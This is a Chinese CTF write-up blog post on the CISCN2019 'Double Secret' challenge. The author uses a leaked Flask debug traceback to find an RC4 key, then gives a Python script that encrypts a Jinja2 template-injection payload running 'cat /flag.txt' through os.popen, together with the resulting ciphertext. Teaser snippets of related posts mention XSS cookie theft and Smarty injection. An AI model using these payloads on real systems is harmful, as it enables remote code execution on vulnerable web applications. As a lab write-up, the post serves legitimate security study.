[CISCN2019 华东南赛区]Double Secret

已于 2022-10-01 10:15:34 修改
阅读量317 收藏
点赞数
分类专栏: CTF 文章标签: web安全
于 2022-07-19 15:07:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62905261/article/details/125872350
版权
本文介绍了作者在参加[CISCN2019华东南赛区]DoubleSecret挑战时的经历。通过查看源码、扫描robots.txt文件,发现提示与安卓CTF有关。进一步尝试传递secret参数,发现页面回显并随输入值变化,当输入过大时,报错信息揭示了RC4加密方式和密钥。作者编写Python脚本进行RC4加密解密,最终成功解出Flag。这是一个关于网络安全和加密技术的实际应用案例。
摘要由CSDN通过智能技术生成

[CISCN2019 华东南赛区]Double Secret

 f12查看源码发现什么东西也没有

dirsearch扫描发下了robots.txt

 

访问robots.txt告诉我们这是一个安卓的ctf,对我来说没什么用处

 

 试一下给url传secret

 

 页面一直在强调secret,试一下给secret赋值

 

 发现有回显,并且传入的值不同,回显也会随着改变,当传入的值非常的大的时候页面就报错了,但是在报错页面发现了有用的东西:

File "/app/app.py", line 35, in secret
    if(secret==None):
        return 'Tell me your secret.I will encrypt it so others can\'t see'
    rc=rc4_Modified.RC4("HereIsTreasure")   #解密
    deS=rc.do_crypt(secret)
 
    a=render_template_string(safe(deS))
 
Open an interactive python shell in this frame    ​if 'ciscn' in a.lower()
        return 'flag detected!'
    return a

可以看到这是RC4加密,并且密钥为HereIsTreasure,脚本小子出击:

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    return s_box
def rc4_excrypt(plain, box):
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{lipsum.__globals__.__builtins__.eval(\"__import__('os').popen('cat /flag.txt').read()\")}}")

 .%14U%5C%C2%BA%14%1Ec%25%C2%A2%C3%A7%14%C2%B2%C2%BD%C3%B4%C2%A98%C2%80k%0B%C3%B9m%C3%9Fp%1F%C2%984%C2%9D%5B%C3%82%21%C3%98%12%C3%85H%C3%80%09%C3%BD%60%C2%A6D%C3%A5%C2%84%C3%AF%7D%01%C2%AF%0E%C2%9A%C2%82%0E%2Bm%C3%B8m%25%C3%99/G%C3%94%C2%BCDY%C2%B2%C2%97%18%C2%AE%09uB%3B%C3%A8H%C2%95-%C3%B8h%C3%94%21%17%2C3D%C2%8B%C2%9E%12%C3%BA%C3%BF%C2%BB%C3%9A

直接传入到secret中即得flag

 

一夜至秋.
关注
专栏目录
[CISCN2019 华东赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 468
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
[CISCN2019 华东赛区]Web4
Youth____的博客
02-05 1058
首先打开题目环境 有一个链接可以打开 这就直接跳转到了百度,在url栏里面有参数,就像直接试试读取文件 尝试读取/etc/passwd 成功读取,那就试试看能不能直接读取flag 果然不行,然后看了眼cookie,里面有session,那会不会是flask伪造??? 那里面的session拿到JWT上解 解出这个,后面是base64加密的,解密后为www-data 如果是flask伪造的话我们就要找SECRET_KEY 读取/proc/self/environ 读取/app/app.py #
[CISCN 2019华东]Double Secret
最新发布
ph0ebus的博客
02-07 1072
从一道赛题学习关于flask的模板注入和了解RC4加密
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
[CISCN2019 华东赛区]Web2
qq_42551635的博客
05-13 489
[CISCN2019 华东赛区]Web2 前言 特别好的一道题,做完神清气爽,学到好多东西 知识点 xss 攻击获取cookie buu攻击平台 利用 cookie 获取管理员权限 获取到管理员cookie后,利用控制台中的application模块,修改页面cookie md5验证码哈希 import hashlib def func(md5_val): for x in range(999999, 100000000): md5_value=hashlib.md5(str(x
BUUCTF:[CISCN2019 华东赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 963
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
[CISCN2019 华东赛区]Double Secret flask模板 rc4加密
qq_62046696的博客
10-30 439
因为这是python中的flask模板界面,所以我们自然而然地可以想到用ssti模板注入。这里应该是进行了rc4的加密,解密密钥是HereIsTreasure。打开界面,这种要么让我们访问Secret页面,要么传参Secret。这里记得大小写的Secret都要尝试,然后让我们传参一个secret。以前碰到过这样进行输入源码,打算用脚本爆破,试一个比较大的值。需要一个rc4加密脚本,从网上搜一个。
【BUUCTF】[CISCN2019 华东赛区]Double Secret
aoao331198的博客
04-22 1894
尝试/secret ?secret=1 输入长一点 发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码 仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.
[CISCN2019 华东赛区]Double Secret flask的debug
qq_54929891的博客
04-10 1294
打开靶机可以发现什么都没有,扫目录发现robots.txt,console(secret页面不知道为啥我开始没有扫出来) 进入console是一个交互平台,需要pin值,有点像python的debug(我开始还在这里看了很久的js文件) robots.txt我以为会给几个地址呢,结果告诉是一个安卓ctf,对于现在水平的我感觉没多大帮助 secret终于有用了,告诉我们给他一个secret值,它会加密让别人看不见,不知道是不是flag,试试吧,便用GET或者POST方法上传secret参数试
[CISCN2019 华东赛区]Double Secret——还要加密?
Mrs_H的博客
11-17 341
[CISCN2019 华东赛区]Double Secret 一.前言 这波属于是忙里偷闲了,面对着几篇大作业却没有任何思绪的我,默默打开了BUU的靶场,开始了我的“偷闲”之旅(doge。可能是最近临近期末的缘故,各个老师的作业数量都开始发力了。上个学期还都是1000字,1500字,最多也就3000字,这学期倒好上来直接8000大作业,直接给我干蒙了。算了,废话不多说了直接看题吧。 二.正文 首先,老样子先截一个“案发现场”的图 经典的没有前端界面,他让我们来找secret,所以我们去访问一下secret
BUUCTF:[CISCN2019 华东赛区]Double Secret
末初的CSDN博客
04-21 1475
BUUCTF:[CISCN2019 华东赛区]Double Secret 查看robots.txt 无可用信息 线索在目录:http://274c1aad-138b-4fe6-9815-8feeaf028127.node3.buuoj.cn/secret 尝试传参?secret= 发现当字符串长度超过4位的时候,出现报错 寻找关键代码 这里调用了rc4再通过render_templat...
BUUCTF--[CISCN2019 华东赛区]Double Secret
qq_46263951的博客
07-18 845
首先进入页面后发现只有短短的一句话Welcome To Find Secret 看大佬们都是直接猜出来的/secret目录的,由于能力有限老老实实地用dirsearch扫出来了 进入目录后提示Tell me your secret.I will encrypt it so others can't see import base64 from urllib.parse import quote def rc4_main(key = "init_key", message = "init_mes.
华东赛区智能车竞赛经验总结与资料分享
资源摘要信息:"本资料集合了在第十六届全国大学生智能车竞赛中,华东赛区单车拉力组获得全国二等奖的设计资料,对有志于参与智能车竞赛的学生具有极高的参考价值。资料内容丰富,包括了参考资料、程序代码、PCB工程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值